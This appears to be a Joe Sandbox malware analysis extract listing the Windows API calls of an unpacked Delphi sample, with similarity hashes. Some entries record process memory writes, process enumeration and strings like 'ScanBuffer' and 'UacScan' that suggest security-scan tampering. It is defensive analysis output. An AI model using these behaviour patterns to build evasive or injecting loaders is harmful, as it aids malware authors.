  • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
  • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
  • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
  • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
  • Part of subcall function 02C47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C47D74
• FreeLibrary.KERNEL32(74F60000,00000000,02C91388,Function_000065D8,00000004,02C91398,02C91388,05F5E0FF,00000040,02C9139C,74F60000,00000000,00000000,00000000,00000000,02C4890B), ref: 02C488EB
Similarity
• API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
• String ID:
• API String ID: 3283153180-0
• Opcode ID: 27b1e5532e8fa65fba55b8cf7fef06d16c545b38b8589158d09513af69d942c4
• Instruction ID: 876d80917107416cf0aef5388c74ab9baf6649727deee3dcbb6a0b12ca8f1ffd
• Opcode Fuzzy Hash: 27b1e5532e8fa65fba55b8cf7fef06d16c545b38b8589158d09513af69d942c4
• Instruction Fuzzy Hash: 81114F70A40305ABEF16FBA4DC06A5F77BEEB45710F550AF4B10CA7A40DEB4D900AB54
APIs
• VariantCopy.OLEAUT32(00000000,00000000), ref: 02C3E709
  • Part of subcall function 02C3E2EC: VariantClear.OLEAUT32(?), ref: 02C3E2FB
Similarity
• API ID: Variant$ClearCopy
• String ID:
• API String ID: 274517740-0
• Opcode ID: d0737b2daefda1b24bb8018fb002f96564f84ad4a1094679b78b772ea5deb5a5
• Instruction ID: 1f454b962f851d6ddcae387f50b9eae25594b377686405703df08f55b3a796ec
• Opcode Fuzzy Hash: d0737b2daefda1b24bb8018fb002f96564f84ad4a1094679b78b772ea5deb5a5
• Instruction Fuzzy Hash: 0911A12171031087CB23AF29CDC566B77EAEFC67507059C26EA4A8B255DB31CC41DBA2
APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02C31A03), ref: 02C315E2
Strings
Similarity
• API ID: AllocVirtual
• String ID: 0`
• API String ID: 4275171209-3339448193
• Opcode ID: 93f3f8f16bf150280ae0a5234ef29d3fda9653b6c3835542e184020d9ec05bb5
• Instruction ID: ea47e52f824054a7dd528c5a83d986dc1129c3c944e20efb11ed16ae41ee52a4
• Opcode Fuzzy Hash: 93f3f8f16bf150280ae0a5234ef29d3fda9653b6c3835542e184020d9ec05bb5
• Instruction Fuzzy Hash: 2DF0E7F1B513005FEB06DF799D443056AD6E789348F14CA79E609DB298E7B194118B14
APIs
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitVariant
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1927566239-0
                                                                                                                                      • Opcode ID: a53b91ef3837f6d3cbb67800c531273a8186b0d2077bb124b33fc8e984af720e
                                                                                                                                      • Instruction ID: 169d269799498383b28ef78e97ab7cec88e34dc37119535cf41ae2fab888a405
                                                                                                                                      • Opcode Fuzzy Hash: a53b91ef3837f6d3cbb67800c531273a8186b0d2077bb124b33fc8e984af720e
                                                                                                                                      • Instruction Fuzzy Hash: 59317C71A00209AFDB52DEA8C985AEE77E8EF4C324F444961F919D3240D734EA50CFA2
                                                                                                                                      APIs
                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,?,00000000,02C46D41,?,?,?,00000000), ref: 02C46D21
                                                                                                                                        • Part of subcall function 02C34C0C: SysFreeString.OLEAUT32(02C4E950), ref: 02C34C1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeFromProgString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4225568880-0
                                                                                                                                      • Opcode ID: 3fad58aedb1c75769ecbb75a2cce9eebf0dd03e9eeed947982819afc7827c010
                                                                                                                                      • Instruction ID: a125ab59acde35d247f3d8aebd8c87fdc0ae31bad23e4d0e4996637bd49db177
                                                                                                                                      • Opcode Fuzzy Hash: 3fad58aedb1c75769ecbb75a2cce9eebf0dd03e9eeed947982819afc7827c010
                                                                                                                                      • Instruction Fuzzy Hash: FCE06D31604708BBE716EBA1DC519AA77EDEB4AB10B614871E801D3610DA74AE00A860
                                                                                                                                      APIs
                                                                                                                                      • GetModuleFileNameA.KERNEL32(02C30000,?,00000105), ref: 02C35832
                                                                                                                                        • Part of subcall function 02C35A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C30000,02C5D790), ref: 02C35A94
                                                                                                                                        • Part of subcall function 02C35A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C30000,02C5D790), ref: 02C35AB2
                                                                                                                                        • Part of subcall function 02C35A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C30000,02C5D790), ref: 02C35AD0
                                                                                                                                        • Part of subcall function 02C35A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C35AEE
                                                                                                                                        • Part of subcall function 02C35A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C35B37
                                                                                                                                        • Part of subcall function 02C35A78: RegQueryValueExA.ADVAPI32(?,02C35CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C35B7D,?,80000001), ref: 02C35B55
                                                                                                                                        • Part of subcall function 02C35A78: RegCloseKey.ADVAPI32(?,02C35B84,00000000,?,?,00000000,02C35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C35B77
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2796650324-0
                                                                                                                                      • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                      • Instruction ID: e5ff093e4fc6e4d3ad24ce9c13cb91ec35385804c5dab0c24c612c3925239daa
                                                                                                                                      • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                      • Instruction Fuzzy Hash: CBE06DB1A402148FCB11DE5888C0AA637D8AF08790F440965EC58DF34AD3B0DA109BD1
                                                                                                                                      APIs
                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02C37DB0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                      • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                      • Instruction ID: 889a4e43277026b240868d4baea2f3c48c1df0fa0f1efa9d6fdaf662c5eb5097
                                                                                                                                      • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                      • Instruction Fuzzy Hash: 56D05BB23081107AD220A95A6C44EB75BDCCBC9770F100A39B658C7180D7208C058671
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02C4F8CC,ScanString,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,UacScan,02C9137C,02C5AFD8,UacInitialize), ref: 02C37E23
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
                                                                                                                                      • Instruction ID: a58e83413309cfa454b5d7fe7d7cf59415d54b701836de4b641e666d4065c17f
                                                                                                                                      • Opcode Fuzzy Hash: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
                                                                                                                                      • Instruction Fuzzy Hash: 8BC08CE22023400E6A66A1FC0CC400A42CC09842383A40F35B038CABD2D321882A3410
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02C52A49,ScanString,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,Initialize), ref: 02C37E47
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
                                                                                                                                      • Instruction ID: 199cef5d8018864acb1155c60cd2caf9ec10bdb8739f89b4b6dbd34833971152
                                                                                                                                      • Opcode Fuzzy Hash: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
                                                                                                                                      • Instruction Fuzzy Hash: B3C08CE12023040E9E62A2FC1CC029A42CE09842343A01F31E038DA2C2D311D82A3410
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3341692771-0
                                                                                                                                      • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                                      • Instruction ID: 5b2e2b8d1dc7300591a28de7ee878c7587a456f6a32caa9c7c20d692e4c3323b
                                                                                                                                      • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                                      • Instruction Fuzzy Hash: 01C012A26006244BEF365A98ACC075562CCEB45295B1808A1D408D7241E3A59D005664
                                                                                                                                      APIs
                                                                                                                                      • timeSetEvent.WINMM(00002710,00000000,02C5BB44,00000000,00000001), ref: 02C5BB60
                                                                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 02C34BEB
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
APIs
• SysFreeString.OLEAUT32(00000000), ref: 02C34C03
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02C316A4
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02C31FE4), ref: 02C31704
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C4ABE3,?,?,02C4AC75,00000000,02C4AD51), ref: 02C4A970
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C4A988
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C4A99A
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C4A9AC
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C4A9BE
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C4A9D0
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C4A9E2
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C4A9F4
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C4AA06
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C4AA18
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C4AA2A
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C4AA3C
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C4AA4E
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C4AA60
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C4AA72
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C4AA84
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C4AA96
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
• API String ID: 667068680-597814768
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C358D1
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02C358E8
• lstrcpynA.KERNEL32(?,?,?), ref: 02C35918
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C3597C
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C359B2
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C359C5
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C359D7
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C36BD0,02C30000,02C5D790), ref: 02C359E3
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C36BD0,02C30000), ref: 02C35A17
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C36BD0), ref: 02C35A23
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02C35A45
Strings
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C35B94
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C35BA1
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C35BA7
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C35BD2
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C35C19
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C35C29
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C35C51
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C35C61
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C35C87
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C35C97
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
APIs
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02C37F7D
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C3A76A
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• GetVersionExA.KERNEL32(?,02C5C106,00000000,02C5C11E), ref: 02C3B722
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02C3BDFA,00000000,02C3C013,?,?,00000000,00000000), ref: 02C3A7AB
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C3D225
  • Part of subcall function 02C3D1F0: GetProcAddress.KERNEL32(00000000), ref: 02C3D209
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                      • API String ID: 1646373207-1918263038
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02C46E66
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02C46E77
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02C46E87
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02C46E97
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02C46EA7
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02C46EB7
                                                                                                                                      • GetProcAddress.KERNEL32 ref: 02C46EC7
                                                                                                                                      Strings
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                      • API String ID: 667068680-2233174745
                                                                                                                                      APIs
                                                                                                                                      • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02C328CE
                                                                                                                                      Strings
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Message
                                                                                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                      • API String ID: 2030045667-32948583
                                                                                                                                      Strings
                                                                                                                                      • , xrefs: 02C32814
                                                                                                                                      • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C32849
                                                                                                                                      • Unexpected Memory Leak, xrefs: 02C328C0
                                                                                                                                      • An unexpected memory leak has occurred. , xrefs: 02C32690
                                                                                                                                      • 7, xrefs: 02C326A1
                                                                                                                                      • bytes: , xrefs: 02C3275D
                                                                                                                                      • The unexpected small block leaks are:, xrefs: 02C32707
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                      • API String ID: 0-2723507874
                                                                                                                                      APIs
                                                                                                                                      • GetThreadLocale.KERNEL32(00000000,02C3C013,?,?,00000000,00000000), ref: 02C3BD7E
                                                                                                                                        • Part of subcall function 02C3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C3A76A
                                                                                                                                      Strings
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                                      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                      • API String ID: 4232894706-2493093252
                                                                                                                                      APIs
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C4AE40
                                                                                                                                      • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02C4AE57
